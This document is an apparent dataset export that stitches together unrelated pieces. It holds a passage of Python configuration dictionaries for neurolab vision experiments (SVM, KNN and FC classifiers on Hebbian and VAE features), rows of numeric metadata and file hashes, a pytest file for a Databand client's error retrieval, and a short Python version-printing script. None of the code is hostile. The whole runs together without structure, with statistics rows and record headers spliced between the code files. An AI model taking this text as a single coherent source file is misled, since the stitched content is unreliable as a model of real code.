P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision//smpleff/gdes_fc_on_hebb_layer_ft[' + str(l) + '_' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_hebb_layer[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/hebb/config_base_hebb[' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_hebb_layer_ft[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_hebb_layer_ft[' + str(l) + '_' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
gdes_fc_on_vae_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.gdes.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: 5e-4,
P.KEY_DROPOUT_P: 0.5,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/vae/config_base_vae[' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
gdes_fc_on_vae_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net', 'models.gdes.fc.Net'],
P.KEY_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/vae/config_base_vae[' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_NET_OUTPUTS: ['bn' + str(l), 'fc'],
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: l2_penalties[ds],
P.KEY_DROPOUT_P: 0.5,
}
hebb_fc_on_vae_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/vae/config_base_vae[' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
hebb_fc_on_vae_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_vae_layer_ft[' + str(l) + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
prec_on_vae_layer_ft[str(l) + '_' + ds + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None,
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 1,
P.KEY_CRIT_METRIC_MANAGER: 'neurolab.optimization.metric.PrecMetricManager',
P.KEY_SKCLF_NUM_SAMPLES: tot_trn_samples[ds],
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: samples_per_class[ds],
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_vae_layer_ft[' + str(l) + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_vae_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/vae/config_base_vae[' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_vae_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_vae_layer_ft[' + str(l) + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_vae_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/vae/config_base_vae[' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_vae_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_vae_layer_ft[' + str(l) + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
| 56.8241
| 227
| 0.685012
| 6,316
| 41,027
| 4.080114
| 0.021374
| 0.098099
| 0.023283
| 0.029104
| 0.989212
| 0.97889
| 0.974544
| 0.974078
| 0.972604
| 0.972604
| 0
| 0.01383
| 0.169888
| 41,027
| 722
| 228
| 56.8241
| 0.742843
| 0
| 0
| 0.849508
| 0
| 0
| 0.246588
| 0.193478
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.040788
| 0.004219
| 0
| 0.004219
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cbeec8ca4f758ff47753b0d103d1a94986732d93
| 122
|
py
|
Python
|
churnmodels/schema/__init__.py
|
ypix/fight-churn-nb
|
fcaaf17a30d69851be42a54c0e68ca4444fb97e1
|
[
"MIT"
] | null | null | null |
churnmodels/schema/__init__.py
|
ypix/fight-churn-nb
|
fcaaf17a30d69851be42a54c0e68ca4444fb97e1
|
[
"MIT"
] | null | null | null |
churnmodels/schema/__init__.py
|
ypix/fight-churn-nb
|
fcaaf17a30d69851be42a54c0e68ca4444fb97e1
|
[
"MIT"
] | null | null | null |
from .models import *
from .model_rfl import _howto_do_it as reflect_db
from .model_rfl import get_schema_rfl, get_db_uri
| 30.5
| 49
| 0.836066
| 23
| 122
| 4
| 0.608696
| 0.195652
| 0.26087
| 0.391304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122951
| 122
| 3
| 50
| 40.666667
| 0.859813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0208c024b891c030cd44e2cbb5f18d29a101441d
| 6,911
|
py
|
Python
|
modules/dbnd/test_dbnd/api/test_databand_client.py
|
dmytrostriletskyi/dbnd
|
d4a5f5167523e80439c9d64182cdc87b40cbc48f
|
[
"Apache-2.0"
] | null | null | null |
modules/dbnd/test_dbnd/api/test_databand_client.py
|
dmytrostriletskyi/dbnd
|
d4a5f5167523e80439c9d64182cdc87b40cbc48f
|
[
"Apache-2.0"
] | null | null | null |
modules/dbnd/test_dbnd/api/test_databand_client.py
|
dmytrostriletskyi/dbnd
|
d4a5f5167523e80439c9d64182cdc87b40cbc48f
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from mock import MagicMock, patch
from dbnd.api.databand_client import DatabandClient
@pytest.fixture
def databand_client():
return DatabandClient.build_databand_client()
@patch("dbnd.api.databand_client.DatabandClient.get_run_info")
def test_get_first_task_run_error(mock_get_run_info, databand_client):
mock_get_run_info.return_value = {
"task_runs": [
{
"latest_error": {
"msg": "Task was killed by the user",
"help_msg": "task with task_run_uid:bf8707be-0a78-11ec-9193-acde48001122 initiated kill_run",
"databand_error": True,
"show_exc_info": False,
"user_code_traceback": '\x1b[0;34mTraceback (most recent call last):\x1b[m\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\x1b[1;31mdbnd._core.errors.base.DatabandError\x1b[m: \x1b[0;32mTask was killed by the user\x1b[m\n\n',
"nested": "",
"traceback": 'Traceback (most recent call last):\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\ndbnd._core.errors.base.DatabandError: Task was killed by the user\n',
},
"latest_task_run_attempt": {
"timestamp": "2021-08-31T16:30:40.760066+00:00",
"start_date": "2021-08-31T16:30:39.792293+00:00",
"end_date": "2021-08-31T16:30:40.760066+00:00",
"latest_error": {
"msg": "Task was killed by the user",
"help_msg": "task with task_run_uid:bf8707be-0a78-11ec-9193-acde48001122 initiated kill_run",
"databand_error": True,
"show_exc_info": False,
"user_code_traceback": '\x1b[0;34mTraceback (most recent call last):\x1b[m\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\x1b[1;31mdbnd._core.errors.base.DatabandError\x1b[m: \x1b[0;32mTask was killed by the user\x1b[m\n\n',
"nested": "",
"traceback": 'Traceback (most recent call last):\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\ndbnd._core.errors.base.DatabandError: Task was killed by the user\n',
},
},
},
],
"run_uid": "bf57cba2-0a78-11ec-b5ea-acde48001122",
}
actual = databand_client.get_first_task_run_error("mock-run-uid")
expected = {
"msg": "Task was killed by the user",
"help_msg": "task with task_run_uid:bf8707be-0a78-11ec-9193-acde48001122 initiated kill_run",
"databand_error": True,
"show_exc_info": False,
"user_code_traceback": '\x1b[0;34mTraceback (most recent call last):\x1b[m\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\x1b[1;31mdbnd._core.errors.base.DatabandError\x1b[m: \x1b[0;32mTask was killed by the user\x1b[m\n\n',
"nested": "",
"traceback": 'Traceback (most recent call last):\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\ndbnd._core.errors.base.DatabandError: Task was killed by the user\n',
}
assert actual == expected
@patch("dbnd.api.databand_client.DatabandClient.get_run_info")
def test_get_first_task_run_error_with_no_end_date(mock_get_run_info, databand_client):
mock_get_run_info.return_value = {
"task_runs": [
{
"latest_error": {
"msg": "Task was killed by the user",
"help_msg": "task with task_run_uid:bf8707be-0a78-11ec-9193-acde48001122 initiated kill_run",
"databand_error": True,
"show_exc_info": False,
"user_code_traceback": '\x1b[0;34mTraceback (most recent call last):\x1b[m\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\x1b[1;31mdbnd._core.errors.base.DatabandError\x1b[m: \x1b[0;32mTask was killed by the user\x1b[m\n\n',
"nested": "",
"traceback": 'Traceback (most recent call last):\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\ndbnd._core.errors.base.DatabandError: Task was killed by the user\n',
},
"latest_task_run_attempt": {
"timestamp": "2021-08-31T16:30:40.760066+00:00",
"start_date": "2021-08-31T16:30:39.792293+00:00",
"end_date": None,
"latest_error": {
"msg": "Task was killed by the user",
"help_msg": "task with task_run_uid:bf8707be-0a78-11ec-9193-acde48001122 initiated kill_run",
"databand_error": True,
"show_exc_info": False,
"user_code_traceback": '\x1b[0;34mTraceback (most recent call last):\x1b[m\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\x1b[1;31mdbnd._core.errors.base.DatabandError\x1b[m: \x1b[0;32mTask was killed by the user\x1b[m\n\n',
"nested": "",
"traceback": 'Traceback (most recent call last):\n File "/Users/adam_elgressy/dbnd-alpha/databand/dbnd-core/modules/dbnd/src/dbnd/_core/task_run/task_run_error.py", line 60, in build_from_message\n msg, show_exc_info=False, help_msg=help_msg,\ndbnd._core.errors.base.DatabandError: Task was killed by the user\n',
},
},
},
],
"run_uid": "bf57cba2-0a78-11ec-b5ea-acde48001122",
}
actual = databand_client.get_first_task_run_error("mock-run-uid")
expected = None
assert actual == expected
| 74.311828
| 399
| 0.644625
| 975
| 6,911
| 4.330256
| 0.100513
| 0.051397
| 0.039081
| 0.049739
| 0.949076
| 0.949076
| 0.949076
| 0.949076
| 0.943155
| 0.943155
| 0
| 0.066579
| 0.230647
| 6,911
| 92
| 400
| 75.119565
| 0.727478
| 0
| 0
| 0.702381
| 0
| 0.119048
| 0.676458
| 0.339604
| 0
| 0
| 0
| 0
| 0.02381
| 1
| 0.035714
| false
| 0
| 0.035714
| 0.011905
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
02539be657cf06f0346f5baa8ee93c46c66f1301
| 57
|
py
|
Python
|
pythonversion.py
|
bjoffficial/Python
|
73e6fdc19a1bec18488405c4a60c30ba68581ce5
|
[
"Apache-2.0"
] | null | null | null |
pythonversion.py
|
bjoffficial/Python
|
73e6fdc19a1bec18488405c4a60c30ba68581ce5
|
[
"Apache-2.0"
] | null | null | null |
pythonversion.py
|
bjoffficial/Python
|
73e6fdc19a1bec18488405c4a60c30ba68581ce5
|
[
"Apache-2.0"
] | null | null | null |
import sys
print(sys.version)
print(sys.version_info)
| 14.25
| 24
| 0.77193
| 9
| 57
| 4.777778
| 0.555556
| 0.372093
| 0.697674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122807
| 57
| 3
| 25
| 19
| 0.86
| 0
| 0
| 0
